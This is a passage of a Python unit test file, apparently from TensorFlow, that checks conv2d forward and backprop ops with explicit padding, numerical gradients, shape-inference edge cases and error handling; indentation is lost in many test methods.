padding=[[0, 0], [0, 0]],
data_format=data_format,
use_gpu=use_gpu)
self._RunAndVerifyBackpropInputExplicitPadding(
input_sizes=[1, 3, 4, 2],
filter_sizes=[2, 2, 2, 3],
output_sizes=[1, 1, 2, 3],
strides=[2, 2],
padding=[[0, 0], [0, 0]],
data_format=data_format,
use_gpu=use_gpu)
@test_util.run_in_graph_and_eager_modes()
def testConv2D2x2Depth1Padding1x1BackpropInput(self):
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropInputExplicitPadding(
input_sizes=[1, 2, 3, 1],
filter_sizes=[2, 2, 1, 2],
output_sizes=[1, 3, 4, 2],
strides=[1, 1],
padding=[[1, 1], [1, 1]],
data_format=data_format,
use_gpu=use_gpu,
err=1e-4)
self._RunAndVerifyBackpropInputExplicitPadding(
input_sizes=[1, 2, 3, 2],
filter_sizes=[1, 1, 2, 1],
output_sizes=[1, 4, 3, 1],
strides=[1, 2],
padding=[[1, 1], [1, 1]],
data_format=data_format,
use_gpu=use_gpu)
self._RunAndVerifyBackpropInputExplicitPadding(
input_sizes=[1, 4, 3, 1],
filter_sizes=[2, 2, 1, 1],
output_sizes=[1, 4, 2, 1],
strides=[1, 2],
padding=[[1, 1], [1, 1]],
data_format=data_format,
dilations=[2, 2], use_gpu=use_gpu)
@test_util.run_in_graph_and_eager_modes()
def testConv2D2x2Depth1Padding2x2BackpropInput(self):
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropInputExplicitPadding(
input_sizes=[2, 3, 1, 1],
filter_sizes=[2, 1, 1, 1],
output_sizes=[2, 2, 5, 1],
strides=[3, 1],
padding=[[2, 2], [2, 2]],
data_format=data_format,
use_gpu=use_gpu)
self._RunAndVerifyBackpropInputExplicitPadding(
input_sizes=[1, 3, 6, 1],
filter_sizes=[3, 2, 1, 1],
output_sizes=[1, 3, 4, 1],
strides=[1, 2],
padding=[[2, 2], [2, 2]],
data_format=data_format,
dilations=[2, 3],
use_gpu=use_gpu)
@test_util.run_in_graph_and_eager_modes()
def testConv2D2x2Depth1Padding_1_8_4_1_BackpropInput(self):
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropInputExplicitPadding(
input_sizes=[1, 2, 3, 1],
filter_sizes=[2, 2, 1, 1],
output_sizes=[1, 10, 8, 1],
strides=[1, 1],
padding=[[1, 8], [4, 2]],
data_format=data_format,
use_gpu=use_gpu,
err=5e-5)
self._RunAndVerifyBackpropInputExplicitPadding(
input_sizes=[1, 5, 3, 1],
filter_sizes=[3, 2, 1, 1],
output_sizes=[1, 4, 8, 1],
strides=[3, 1],
padding=[[1, 8], [4, 2]],
data_format=data_format,
use_gpu=use_gpu)
@test_util.run_in_graph_and_eager_modes()
def testConv2D2x2Depth1Padding_5_0_2_2_BackpropInput(self):
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropInputExplicitPadding(
input_sizes=[1, 3, 3, 1],
filter_sizes=[2, 1, 1, 1],
output_sizes=[1, 7, 7, 1],
strides=[1, 1],
padding=[[5, 0], [2, 2]],
data_format=data_format,
err=5e-5,
use_gpu=use_gpu)
self._RunAndVerifyBackpropInputExplicitPadding(
input_sizes=[1, 4, 2, 1],
filter_sizes=[3, 3, 1, 1],
output_sizes=[1, 5, 2, 1],
strides=[1, 2],
padding=[[5, 0], [2, 2]],
data_format=data_format,
dilations=[2, 1],
use_gpu=use_gpu)
  def _RunAndVerifyBackpropFilterExplicitPadding(self,
                                                 input_sizes,
                                                 filter_sizes,
                                                 output_sizes,
                                                 strides,
                                                 padding,
                                                 data_format,
                                                 use_gpu,
                                                 dilations=(1, 1),
                                                 err=1e-5):
    """Verifies conv2d_backprop_filter with explicit padding.

    Computes a reference gradient by zero-padding the input with np.pad and
    running conv2d_backprop_filter with VALID padding, then delegates to
    _RunAndVerifyBackpropFilter with the explicit `padding` to check the
    op produces the same values.

    Args:
      input_sizes: Unpadded input dimensions in NHWC order.
      filter_sizes: Filter dimensions [height, width, in_depth, out_depth].
      output_sizes: Output-gradient dimensions in NHWC order.
      strides: [row_stride, col_stride].
      padding: Explicit spatial padding [[top, bottom], [left, right]].
      data_format: "NHWC" or "NCHW".
      use_gpu: Whether to run on GPU; skipped if no CUDA GPU. Non-default
        dilations are only exercised on GPU.
      dilations: [row_dilation, col_dilation].
      err: Tolerance passed through to the verifier.
    """
    if use_gpu and not test.is_gpu_available(cuda_only=True):
      return
    if not use_gpu and dilations != (1, 1):
      return  # Non-default dilations is not supported on the CPU.
    x0 = self._CreateNumpyTensor(input_sizes)
    x2 = self._CreateNumpyTensor(output_sizes)
    dilations = list(dilations)
    # Reference path: materialize the explicit padding in numpy, run VALID.
    x0 = np.pad(x0, [(0, 0)] + padding + [(0, 0)], "constant")
    c = nn_ops.conv2d_backprop_filter(
        x0,
        filter_sizes,
        x2,
        strides=[1] + strides + [1],
        padding="VALID",
        dilations=[1] + dilations + [1])
    expected = list(self.evaluate(array_ops.reshape(c, [-1])))
    self._RunAndVerifyBackpropFilter(
        input_sizes,
        filter_sizes,
        output_sizes,
        strides,
        padding,
        expected,
        data_format,
        use_gpu=use_gpu,
        dilations=dilations,
        err=err)
@test_util.run_in_graph_and_eager_modes()
def testConv2D2x2Depth1Padding0x0BackpropFilter(self):
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropFilterExplicitPadding(
input_sizes=[1, 2, 3, 1],
filter_sizes=[2, 2, 1, 1],
output_sizes=[1, 1, 2, 1],
strides=[1, 1],
padding=[[0, 0], [0, 0]],
data_format=data_format, use_gpu=use_gpu)
self._RunAndVerifyBackpropFilterExplicitPadding(
input_sizes=[1, 3, 4, 2],
filter_sizes=[2, 2, 2, 3],
output_sizes=[1, 1, 2, 3],
strides=[2, 2],
padding=[[0, 0], [0, 0]],
data_format=data_format, use_gpu=use_gpu)
@test_util.run_in_graph_and_eager_modes()
def testConv2D2x2Depth1Padding1x1BackpropFilter(self):
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropFilterExplicitPadding(
input_sizes=[1, 2, 3, 1],
filter_sizes=[2, 2, 1, 2],
output_sizes=[1, 3, 4, 2],
strides=[1, 1],
padding=[[1, 1], [1, 1]],
data_format=data_format,
use_gpu=use_gpu,
err=5e-5)
self._RunAndVerifyBackpropFilterExplicitPadding(
input_sizes=[1, 2, 3, 2],
filter_sizes=[1, 1, 2, 1],
output_sizes=[1, 4, 3, 1],
strides=[1, 2],
padding=[[1, 1], [1, 1]],
use_gpu=use_gpu,
data_format=data_format)
self._RunAndVerifyBackpropFilterExplicitPadding(
input_sizes=[1, 4, 3, 1],
filter_sizes=[2, 2, 1, 1],
output_sizes=[1, 4, 2, 1],
strides=[1, 2],
padding=[[1, 1], [1, 1]],
data_format=data_format,
use_gpu=use_gpu,
dilations=[2, 2])
@test_util.run_in_graph_and_eager_modes()
def testConv2D2x2Depth1Padding2x2BackpropFilter(self):
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropFilterExplicitPadding(
input_sizes=[2, 3, 1, 1],
filter_sizes=[2, 1, 1, 1],
output_sizes=[2, 2, 5, 1],
strides=[3, 1],
padding=[[2, 2], [2, 2]],
data_format=data_format,
use_gpu=use_gpu)
self._RunAndVerifyBackpropFilterExplicitPadding(
input_sizes=[1, 3, 6, 1],
filter_sizes=[3, 2, 1, 1],
output_sizes=[1, 3, 4, 1],
strides=[1, 2],
padding=[[2, 2], [2, 2]],
data_format=data_format,
use_gpu=use_gpu,
dilations=[2, 3])
@test_util.run_in_graph_and_eager_modes()
def testConv2D2x2Depth1Padding_1_8_4_1_BackpropFilter(self):
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropFilterExplicitPadding(
input_sizes=[1, 2, 3, 1],
filter_sizes=[2, 2, 1, 1],
output_sizes=[1, 10, 8, 1],
strides=[1, 1],
padding=[[1, 8], [4, 2]],
data_format=data_format,
use_gpu=use_gpu,
err=1e-4)
self._RunAndVerifyBackpropFilterExplicitPadding(
input_sizes=[1, 5, 3, 1],
filter_sizes=[3, 2, 1, 1],
output_sizes=[1, 4, 8, 1],
strides=[3, 1],
padding=[[1, 8], [4, 2]],
use_gpu=use_gpu,
data_format=data_format)
@test_util.run_in_graph_and_eager_modes()
def testConv2D2x2Depth1Padding_5_0_2_2_BackpropFilter(self):
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropFilterExplicitPadding(
input_sizes=[1, 3, 3, 1],
filter_sizes=[2, 1, 1, 1],
output_sizes=[1, 7, 7, 1],
strides=[1, 1],
padding=[[5, 0], [2, 2]],
data_format=data_format,
use_gpu=use_gpu,
err=1e-4)
self._RunAndVerifyBackpropFilterExplicitPadding(
input_sizes=[1, 4, 2, 1],
filter_sizes=[3, 3, 1, 1],
output_sizes=[1, 5, 2, 1],
strides=[1, 2],
padding=[[5, 0], [2, 2]],
data_format=data_format,
use_gpu=use_gpu,
dilations=[2, 1])
  def ConstructAndTestGradient(self,
                               batch,
                               input_rows,
                               input_cols,
                               filter_rows,
                               filter_cols,
                               in_depth,
                               out_depth,
                               stride_rows,
                               stride_cols,
                               padding,
                               test_input,
                               data_format,
                               use_gpu,
                               num_groups=1,
                               max_err=0.003):
    """Numerically checks conv2d gradients for one test configuration.

    Builds a conv2d op over deterministic input/filter values and compares
    theoretical against numerical gradients for float32; for other dtypes the
    theoretical gradients are compared against the float32 theoretical
    gradients instead (their numerical gradients are too imprecise).

    Args:
      batch: Batch size of the input.
      input_rows: Input height.
      input_cols: Input width.
      filter_rows: Filter height.
      filter_cols: Filter width.
      in_depth: Number of input channels.
      out_depth: Number of output channels.
      stride_rows: Vertical stride.
      stride_cols: Horizontal stride.
      padding: "VALID", "SAME", or an explicit 4x2 padding list in NHWC order.
      test_input: If True, check the gradient w.r.t. the input; otherwise
        check the gradient w.r.t. the filter.
      data_format: "NHWC" or "NCHW".
      use_gpu: Whether to run on GPU.
      num_groups: Number of groups for grouped convolution; must evenly
        divide both in_depth and out_depth.
      max_err: Maximum allowed absolute gradient error.
    """
    assert in_depth % num_groups == 0 and out_depth % num_groups == 0
    input_shape = [batch, input_rows, input_cols, in_depth]
    filter_shape = [filter_rows, filter_cols, in_depth // num_groups, out_depth]
    # Expected output spatial dimensions for each padding mode.  For explicit
    # padding, padding[1]/padding[2] are the (top, bottom)/(left, right)
    # amounts in NHWC order.
    if padding == "VALID":
      output_rows = (input_rows - filter_rows + stride_rows) // stride_rows
      output_cols = (input_cols - filter_cols + stride_cols) // stride_cols
    elif padding == "SAME":
      output_rows = (input_rows + stride_rows - 1) // stride_rows
      output_cols = (input_cols + stride_cols - 1) // stride_cols
    else:
      self.assertIsInstance(padding, (list, tuple))
      output_rows = (input_rows + padding[1][0] + padding[1][1] - filter_rows +
                     stride_rows) // stride_rows
      output_cols = (input_cols + padding[2][0] + padding[2][1] - filter_cols +
                     stride_cols) // stride_cols
    output_shape = [batch, output_rows, output_cols, out_depth]
    input_size = 1
    for x in input_shape:
      input_size *= x
    filter_size = 1
    for x in filter_shape:
      filter_size *= x
    # Deterministic values in [0, 1) so runs are reproducible.
    input_data = [x * 1.0 / input_size for x in range(0, input_size)]
    filter_data = [x * 1.0 / filter_size for x in range(0, filter_size)]
    # Double is not currently exercised here (only the dtypes returned by
    # _DtypesToTest); re-enable the DOUBLE path when double support returns
    # for CPU and/or GPU.
    for dtype in self._DtypesToTest(use_gpu=use_gpu):
      with self.cached_session(use_gpu=use_gpu):
        input_tensor = constant_op.constant(
            input_data, shape=input_shape, dtype=dtype, name="input")
        filter_tensor = constant_op.constant(
            filter_data, shape=filter_shape, dtype=dtype, name="filter")
        strides = [1, stride_rows, stride_cols, 1]
        new_padding = padding
        if data_format == "NCHW":
          # Test parameters above are specified in NHWC; convert for NCHW.
          new_input_tensor = test_util.NHWCToNCHW(input_tensor)
          strides = test_util.NHWCToNCHW(strides)
          if isinstance(padding, (list, tuple)):
            new_padding = test_util.NHWCToNCHW(padding)
        else:
          new_input_tensor = input_tensor
        conv = nn_ops.conv2d(
            new_input_tensor,
            filter_tensor,
            strides,
            new_padding,
            data_format=data_format,
            name="conv")
        if data_format == "NCHW":
          conv = test_util.NCHWToNHWC(conv)
        self.assertEqual(output_shape, conv.get_shape())
        if test_input:
          jacob_t, jacob_n = gradient_checker.compute_gradient(input_tensor,
                                                               input_shape,
                                                               conv,
                                                               output_shape)
        else:
          jacob_t, jacob_n = gradient_checker.compute_gradient(filter_tensor,
                                                               filter_shape,
                                                               conv,
                                                               output_shape)
        if dtype == dtypes.float32:
          # float32 runs first, so reference_jacob_t is available for the
          # other dtypes in later iterations.
          reference_jacob_t = jacob_t
          err = np.fabs(jacob_t - jacob_n).max()
        else:
          # Compare fp16 theoretical gradients to fp32 theoretical gradients,
          # since fp16 numerical gradients are too imprecise.
          err = np.fabs(jacob_t - reference_jacob_t).max()
        tf_logging.debug("conv_2d gradient error = %s", err)
        self.assertLess(err, max_err)
@test_util.deprecated_graph_mode_only
def testInputGradientValidPaddingStrideOne(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=2,
input_rows=5,
input_cols=4,
filter_rows=3,
filter_cols=3,
in_depth=2,
out_depth=3,
stride_rows=1,
stride_cols=1,
padding="VALID",
test_input=True,
data_format=data_format,
use_gpu=use_gpu)
@test_util.deprecated_graph_mode_only
def testFilterGradientValidPaddingStrideOne(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=4,
input_rows=6,
input_cols=5,
filter_rows=2,
filter_cols=2,
in_depth=2,
out_depth=3,
stride_rows=1,
stride_cols=1,
padding="VALID",
test_input=False,
data_format=data_format,
use_gpu=use_gpu)
@test_util.deprecated_graph_mode_only
def testInputGradientValidPaddingStrideTwo(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=2,
input_rows=4,
input_cols=5,
filter_rows=3,
filter_cols=3,
in_depth=2,
out_depth=3,
stride_rows=2,
stride_cols=2,
padding="VALID",
test_input=True,
data_format=data_format,
use_gpu=use_gpu)
@test_util.deprecated_graph_mode_only
def testFilterGradientValidPaddingStrideTwo(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=4,
input_rows=6,
input_cols=5,
filter_rows=2,
filter_cols=2,
in_depth=2,
out_depth=3,
stride_rows=2,
stride_cols=2,
padding="VALID",
test_input=False,
data_format=data_format,
use_gpu=use_gpu)
@test_util.deprecated_graph_mode_only
def testInputGradientValidPaddingStrideThree(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=2,
input_rows=7,
input_cols=6,
filter_rows=3,
filter_cols=3,
in_depth=4,
out_depth=5,
stride_rows=3,
stride_cols=3,
padding="VALID",
test_input=True,
data_format=data_format,
use_gpu=use_gpu)
@test_util.deprecated_graph_mode_only
def testFilterGradientValidPaddingStrideThree(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=2,
input_rows=8,
input_cols=7,
filter_rows=4,
filter_cols=4,
in_depth=2,
out_depth=3,
stride_rows=3,
stride_cols=3,
padding="VALID",
test_input=False,
data_format=data_format,
use_gpu=use_gpu)
@test_util.deprecated_graph_mode_only
def testInputGradientSamePaddingStrideOne(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=2,
input_rows=7,
input_cols=6,
filter_rows=3,
filter_cols=3,
in_depth=2,
out_depth=3,
stride_rows=1,
stride_cols=1,
padding="SAME",
test_input=True,
data_format=data_format,
use_gpu=use_gpu)
@test_util.deprecated_graph_mode_only
def testFilterGradientSamePaddingStrideOne(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=4,
input_rows=6,
input_cols=5,
filter_rows=2,
filter_cols=2,
in_depth=2,
out_depth=3,
stride_rows=1,
stride_cols=1,
padding="SAME",
test_input=False,
data_format=data_format,
use_gpu=use_gpu)
@test_util.deprecated_graph_mode_only
def testInputGradientSamePaddingStrideTwo(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=2,
input_rows=5,
input_cols=4,
filter_rows=3,
filter_cols=3,
in_depth=3,
out_depth=3,
stride_rows=2,
stride_cols=2,
padding="SAME",
test_input=True,
data_format=data_format,
use_gpu=use_gpu)
@test_util.deprecated_graph_mode_only
def testFilterGradientSamePaddingStrideTwo(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=4,
input_rows=6,
input_cols=5,
filter_rows=2,
filter_cols=2,
in_depth=2,
out_depth=3,
stride_rows=2,
stride_cols=2,
padding="SAME",
test_input=False,
data_format=data_format,
use_gpu=use_gpu)
@test_util.deprecated_graph_mode_only
def testInputGradientSamePaddingStrideThree(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=2,
input_rows=7,
input_cols=6,
filter_rows=3,
filter_cols=3,
in_depth=4,
out_depth=5,
stride_rows=3,
stride_cols=3,
padding="SAME",
test_input=True,
data_format=data_format,
use_gpu=use_gpu)
@test_util.deprecated_graph_mode_only
def testFilterGradientSamePaddingStrideThree(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=2,
input_rows=8,
input_cols=7,
filter_rows=4,
filter_cols=4,
in_depth=2,
out_depth=3,
stride_rows=3,
stride_cols=3,
padding="SAME",
test_input=False,
data_format=data_format,
use_gpu=use_gpu)
@test_util.deprecated_graph_mode_only
def testFilterGradientSamePaddingStride2x1(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=2,
input_rows=8,
input_cols=7,
filter_rows=4,
filter_cols=4,
in_depth=2,
out_depth=3,
stride_rows=2,
stride_cols=1,
padding="SAME",
test_input=False,
data_format=data_format,
use_gpu=use_gpu)
@test_util.deprecated_graph_mode_only
def testInputGradientKernelSizeMatchesInputSize(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=2,
input_rows=4,
input_cols=3,
filter_rows=4,
filter_cols=3,
in_depth=2,
out_depth=3,
stride_rows=1,
stride_cols=1,
padding="VALID",
test_input=True,
data_format=data_format,
use_gpu=use_gpu)
@test_util.deprecated_graph_mode_only
def testFilterGradientKernelSizeMatchesInputSize(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=2,
input_rows=4,
input_cols=3,
filter_rows=4,
filter_cols=3,
in_depth=2,
out_depth=3,
stride_rows=1,
stride_cols=1,
padding="VALID",
test_input=False,
data_format=data_format,
use_gpu=use_gpu)
@test_util.deprecated_graph_mode_only
def testInputGradient1x1PaddingStrideOne(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=2,
input_rows=5,
input_cols=4,
filter_rows=3,
filter_cols=3,
in_depth=2,
out_depth=3,
stride_rows=1,
stride_cols=1,
padding=[[0, 0], [1, 1], [1, 1], [0, 0]],
test_input=True,
data_format=data_format,
use_gpu=use_gpu,
max_err=0.0025)
@test_util.deprecated_graph_mode_only
def testFilterGradient1x1PaddingStrideOne(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=2,
input_rows=5,
input_cols=4,
filter_rows=3,
filter_cols=3,
in_depth=2,
out_depth=3,
stride_rows=1,
stride_cols=1,
padding=[[0, 0], [1, 1], [1, 1], [0, 0]],
test_input=False,
data_format=data_format,
use_gpu=use_gpu)
@test_util.deprecated_graph_mode_only
def testInputGradient1x1PaddingStrideTwo(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=2,
input_rows=4,
input_cols=5,
filter_rows=3,
filter_cols=3,
in_depth=2,
out_depth=3,
stride_rows=2,
stride_cols=2,
padding=[[0, 0], [1, 1], [1, 1], [0, 0]],
test_input=True,
data_format=data_format,
use_gpu=use_gpu)
@test_util.deprecated_graph_mode_only
def testFilterGradient1x1PaddingStrideTwo(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=2,
input_rows=4,
input_cols=5,
filter_rows=3,
filter_cols=3,
in_depth=2,
out_depth=3,
stride_rows=2,
stride_cols=2,
padding=[[0, 0], [1, 1], [1, 1], [0, 0]],
test_input=False,
data_format=data_format,
use_gpu=use_gpu)
@test_util.deprecated_graph_mode_only
def testInputGradient2x2PaddingStrideOne(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=2,
input_rows=5,
input_cols=4,
filter_rows=3,
filter_cols=3,
in_depth=2,
out_depth=3,
stride_rows=1,
stride_cols=1,
padding=[[0, 0], [2, 2], [2, 2], [0, 0]],
test_input=True,
data_format=data_format,
use_gpu=use_gpu,
max_err=0.003)
@test_util.deprecated_graph_mode_only
def testFilterGradient2x2PaddingStrideOne(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=2,
input_rows=5,
input_cols=4,
filter_rows=3,
filter_cols=3,
in_depth=2,
out_depth=3,
stride_rows=1,
stride_cols=1,
padding=[[0, 0], [2, 2], [2, 2], [0, 0]],
test_input=False,
data_format=data_format,
use_gpu=use_gpu,
max_err=0.003)
@test_util.deprecated_graph_mode_only
def testInputGradient1_2_3_4PaddingStride3x2(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=2,
input_rows=8,
input_cols=5,
filter_rows=4,
filter_cols=2,
in_depth=3,
out_depth=2,
stride_rows=3,
stride_cols=2,
padding=[[0, 0], [1, 2], [3, 4], [0, 0]],
test_input=True,
data_format=data_format,
use_gpu=use_gpu)
@test_util.deprecated_graph_mode_only
def testFilterGradient1_2_3_4PaddingStride3x2(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=2,
input_rows=8,
input_cols=5,
filter_rows=4,
filter_cols=2,
in_depth=3,
out_depth=2,
stride_rows=3,
stride_cols=2,
padding=[[0, 0], [1, 2], [3, 4], [0, 0]],
test_input=False,
data_format=data_format,
use_gpu=use_gpu)
@test_util.deprecated_graph_mode_only
def testInputGradient4_3_2_1PaddingStride2x1(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=3,
input_rows=5,
input_cols=7,
filter_rows=3,
filter_cols=2,
in_depth=1,
out_depth=2,
stride_rows=2,
stride_cols=1,
padding=[[0, 0], [4, 3], [2, 1], [0, 0]],
test_input=True,
data_format=data_format,
use_gpu=use_gpu)
@test_util.deprecated_graph_mode_only
def testFilterGradient4_3_2_1PaddingStride2x1(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=3,
input_rows=5,
input_cols=7,
filter_rows=3,
filter_cols=2,
in_depth=1,
out_depth=2,
stride_rows=2,
stride_cols=1,
padding=[[0, 0], [4, 3], [2, 1], [0, 0]],
test_input=False,
data_format=data_format,
use_gpu=use_gpu)
@test_util.deprecated_graph_mode_only
def testInputGradient0_0_0_5PaddingStride1x2(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=2,
input_rows=6,
input_cols=7,
filter_rows=3,
filter_cols=4,
in_depth=3,
out_depth=2,
stride_rows=1,
stride_cols=2,
padding=[[0, 0], [0, 0], [0, 5], [0, 0]],
test_input=True,
data_format=data_format,
use_gpu=use_gpu)
@test_util.deprecated_graph_mode_only
def testFilterGradient0_0_0_5PaddingStride1x2(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=2,
input_rows=6,
input_cols=7,
filter_rows=3,
filter_cols=4,
in_depth=3,
out_depth=2,
stride_rows=1,
stride_cols=2,
padding=[[0, 0], [0, 0], [0, 5], [0, 0]],
test_input=False,
data_format=data_format,
use_gpu=use_gpu)
  @test_util.deprecated_graph_mode_only
  def testShapeFunctionEdgeCases(self):
    """Checks conv2d shape inference on unknown, malformed and edge inputs.

    Each malformed argument combination below must raise ValueError at graph
    construction time; the valid cases must build without error.
    """
    # All shapes unknown.
    c1 = nn_ops.conv2d(
        array_ops.placeholder(dtypes.float32),
        array_ops.placeholder(dtypes.float32),
        strides=[1, 1, 1, 1],
        padding="SAME")
    self.assertEqual([None, None, None, None], c1.get_shape().as_list())
    # Incorrect input shape.
    with self.assertRaises(ValueError):
      nn_ops.conv2d(
          array_ops.placeholder(
              dtypes.float32, shape=[1, 3]),
          array_ops.placeholder(dtypes.float32),
          strides=[1, 1, 1, 1],
          padding="SAME")
    # Incorrect filter shape.
    with self.assertRaises(ValueError):
      nn_ops.conv2d(
          array_ops.placeholder(dtypes.float32),
          array_ops.placeholder(
              dtypes.float32, shape=[1, 3]),
          strides=[1, 1, 1, 1],
          padding="SAME")
    # Depth mismatch.
    with self.assertRaises(ValueError):
      nn_ops.conv2d(
          array_ops.placeholder(
              dtypes.float32, shape=[32, 20, 20, 3]),
          array_ops.placeholder(
              dtypes.float32, shape=[4, 4, 2, 2]),
          strides=[1, 1, 1, 1],
          padding="SAME")
    # Input depth divisible by filter depth (group convolution).
    # No exceptions should appear.
    nn_ops.conv2d(
        array_ops.placeholder(dtypes.float32, shape=[32, 20, 20, 8]),
        array_ops.placeholder(dtypes.float32, shape=[4, 4, 2, 16]),
        strides=[1, 1, 1, 1],
        padding="SAME")
    # Negative padding.
    with self.assertRaises(ValueError):
      nn_ops.conv2d(
          array_ops.placeholder(dtypes.float32),
          array_ops.placeholder(dtypes.float32),
          strides=[1, 1, 1, 1],
          padding=[[0, 0], [0, -1], [1, 2], [0, 0]])
    # Nonzero padding in nonspatial dimension.
    with self.assertRaises(ValueError):
      nn_ops.conv2d(
          array_ops.placeholder(dtypes.float32),
          array_ops.placeholder(dtypes.float32),
          strides=[1, 1, 1, 1],
          padding=[[1, 0], [0, 0], [0, 0], [0, 0]])
    # Nonzero NCHW padding in nonspatial dimension.
    with self.assertRaises(ValueError):
      nn_ops.conv2d(
          array_ops.placeholder(dtypes.float32),
          array_ops.placeholder(dtypes.float32),
          strides=[1, 1, 1, 1],
          padding=[[0, 0], [0, 1], [0, 0], [0, 0]],
          data_format="NCHW")
    # Wrong amount of padding
    with self.assertRaises(ValueError):
      nn_ops.conv2d(
          array_ops.placeholder(dtypes.float32),
          array_ops.placeholder(dtypes.float32),
          strides=[1, 1, 1, 1],
          padding=[[0, 0], [0, 0], [0, 0]])
    # Only specify one padding amount per dimension
    with self.assertRaises(ValueError):
      nn_ops.conv2d(
          array_ops.placeholder(dtypes.float32),
          array_ops.placeholder(dtypes.float32),
          strides=[1, 1, 1, 1],
          padding=[[0], [0], [0], [0]])
    # Explicit padding elements are not lists
    with self.assertRaises(ValueError):
      nn_ops.conv2d(
          array_ops.placeholder(dtypes.float32),
          array_ops.placeholder(dtypes.float32),
          strides=[1, 1, 1, 1],
          padding=[0, 0, 0, 0])
  @test_util.deprecated_graph_mode_only
  def testOpEdgeCases(self):
    """Checks runtime error handling of the conv2d op and its backprop ops.

    Covers illegal batch/depth strides, filters larger than the (padded)
    input, and negative explicit padding passed to the backprop ops.
    """
    with self.cached_session() as sess:
      # Illegal strides.
      with self.assertRaisesRegex(errors_impl.UnimplementedError,
                                  "strides in the batch and depth"):
        input_placeholder = array_ops.placeholder(dtypes.float32)
        input_val = np.ones([10, 10])
        filter_placeholder = array_ops.placeholder(dtypes.float32)
        filter_val = np.ones([10, 10])
        sess.run(
            nn_ops.conv2d(
                input_placeholder,
                filter_placeholder,
                strides=[2, 1, 1, 1],
                padding="SAME"),
            feed_dict={
                input_placeholder: input_val,
                filter_placeholder: filter_val
            })
      with self.assertRaisesRegex(errors_impl.UnimplementedError,
                                  "strides in the batch and depth"):
        input_placeholder = array_ops.placeholder(dtypes.float32)
        filter_placeholder = array_ops.placeholder(dtypes.float32)
        input_val = np.ones([10, 10])
        filter_val = np.ones([10, 10])
        sess.run(
            nn_ops.conv2d(
                input_placeholder,
                filter_placeholder,
                strides=[1, 1, 1, 2],
                padding="SAME"),
            feed_dict={
                input_placeholder: input_val,
                filter_placeholder: filter_val
            })
      # Filter larger than input.
      with self.assertRaisesRegex(ValueError, "Negative dimension size"):
        input_placeholder = array_ops.placeholder(
            dtypes.float32, shape=[32, 20, 20, 3])
        input_val = np.ones([32, 20, 20, 3])
        filter_placeholder = array_ops.placeholder(
            dtypes.float32, shape=[20, 21, 3, 2])
        filter_val = np.ones([20, 21, 3, 2])
        sess.run(
            nn_ops.conv2d(
                input_placeholder,
                filter_placeholder,
                strides=[1, 1, 1, 1],
                padding="VALID"),
            feed_dict={
                input_placeholder: input_val,
                filter_placeholder: filter_val
            })
      with self.assertRaisesRegex(ValueError, "Negative dimension size"):
        input_placeholder = array_ops.placeholder(
            dtypes.float32, shape=[32, 20, 20, 3])
        input_val = np.ones([32, 20, 20, 3])
        filter_placeholder = array_ops.placeholder(
            dtypes.float32, shape=[21, 20, 3, 2])
        filter_val = np.ones([21, 20, 3, 2])
        sess.run(
            nn_ops.conv2d(
                input_placeholder,
                filter_placeholder,
                strides=[1, 1, 1, 1],
                padding="VALID"),
            feed_dict={
                input_placeholder: input_val,
                filter_placeholder: filter_val
            })
      # Filter larger than input + padding.
      with self.assertRaisesRegex(ValueError, "Negative dimension size"):
        input_placeholder = array_ops.placeholder(
            dtypes.float32, shape=[32, 20, 20, 3])
        input_val = np.ones([32, 20, 20, 3])
        filter_placeholder = array_ops.placeholder(
            dtypes.float32, shape=[24, 25, 3, 2])
        filter_val = np.ones([24, 25, 3, 2])
        sess.run(
            nn_ops.conv2d(
                input_placeholder,
                filter_placeholder,
                strides=[1, 1, 1, 1],
                padding=[[0, 0], [2, 2], [2, 2], [0, 0]]),
            feed_dict={
                input_placeholder: input_val,
